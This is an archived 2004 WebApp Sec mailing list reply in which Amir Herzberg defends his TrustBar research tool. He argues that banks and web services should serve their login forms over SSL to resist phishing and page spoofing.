WebApp Sec mailing list archives

Previous By Date Next
Previous By Thread Next

Re: TrustBar and insecure sites of PayPal, MS Passport, Yahoo!, Chase, ...

From: Amir Herzberg <herzbea () cs biu ac il>
Date: Tue, 26 Oct 2004 14:50:48 +0200
Yvan G.J. Boily wrote:


The point Mr. Wall was trying to make is that using SSL to "protect" a login
page prior to the actual (HTTP Verb) which submits the credentials to the
web server does nothing to prevent a user from falling victim to a spoofed
web page.
That's incorrect. By protecting the login form, we prevent a rogue page which appears as the original, but sends the password to the attacker instead of sending it (securely) to the correct site. 

Your trustbar tool is essentially just another way of putting information in
front of the users face, however it does nothing that isn't already
available.
This is mostly correct; TrustBar is a secure user interface mechanism. Our research (and common sense) shows that most users do not validate the URL and the certificate, but do notice our `unprotected page` warning vs. the correct logo of the site.
TrustBar also protects from the more advanced (academical?) spoofing attacks, that present fake location bar, padlock etc. But I think that's less important in practice. 


Since the "trustbar" is not part of the default distribution of
a browser it will not do much to further awareness, or protect a user.  This
is more so the case because a user who has the understanding to install the
software will generally not be caught by a phishing scam or fooled by a
spoofed server.
Well... TrustBar is just a research project; we definitely hope the ideas in it will be adopted in future releases of browsers. Also, I think that in many cases, it could be installed on machines of naive users (e.g. by the employer, organization, ISP, etc.). Finally, I actually believe that even security savvy users will find it much more convenient and secure to use TrustBar (or comparable technology) compared to checking manually whenever they use a sensitive site... I definitely feel much better about doing my e-banking now. 
<skip>

The reason this is important is because you claim the "lock" icon is
misleading.  I say that the lock icon is more intuitive than a "trust bar"
or the SSL warnings.  People using e-commerce sites have been indoctrinated
to "look for the padlock" and "click on it for more information".
That's an interesting possibility... I didn't get this feedback in the surveys we did so far, but I'll try to check specifically for it in the future. BTW, I tried doing it on the Chase site and still didn't find any way to reach a protected login page there... is there? 

It is my opinion that you are likely doing more damage than good by
spreading fear, uncertainty, and doubt about a widely used, and commonly
accepted practice to which your proposed solution does essentially nothing
about.
Sorry, that's not my intention. In all your arguments, I didn't see an answer to my simple question: why don't they protect the login page??? Considering that there is a trivial fix to the problem, and that I've pointed it out to all these sites before informing others, I can't really see where you find me wrong. 

I apologize if this seems unduly harsh, but I think that you may have lost
sight of the intended audience during your academic pursuits. 
No offense taken.

Best, Amir Herzberg
http://AmirHerzberg.com
Associate Professor, Computer science department, Bar Ilan University
Previous By Date Next
Previous By Thread Next

Current thread: